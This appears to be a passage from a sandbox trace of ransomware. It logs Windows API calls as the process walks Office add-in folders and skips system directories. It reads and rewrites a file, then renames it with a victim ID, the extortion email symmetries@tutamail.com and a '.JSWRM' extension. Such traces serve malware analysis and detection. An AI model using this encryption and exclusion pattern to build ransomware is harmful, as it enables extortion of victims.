WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.854] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4362) returned 1 [0126.854] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1100) returned 0x279338 [0126.855] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0x1100, lpOverlapped=0x0) returned 1 [0126.858] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.858] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0x1100, lpOverlapped=0x0) returned 1 [0126.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x279338 | out: hHeap=0x1e0000) returned 1 [0126.858] CloseHandle (hObject=0x338) returned 1 [0126.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0126.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0126.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0126.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0126.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0126.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0126.860] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e0a643, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf263c7d5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xca90, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0126.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0126.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0126.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0126.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.860] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c93006, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39088, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.860] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.861] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8719376, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.861] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0126.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.862] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc47ce76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x200030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.862] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0126.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dba8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d698, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.863] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00af60a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2a90, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0126.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0126.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0126.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d298, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0126.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23ddc8 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.863] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc646a83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc646a83, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ca98, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.863] lstrcmpiW 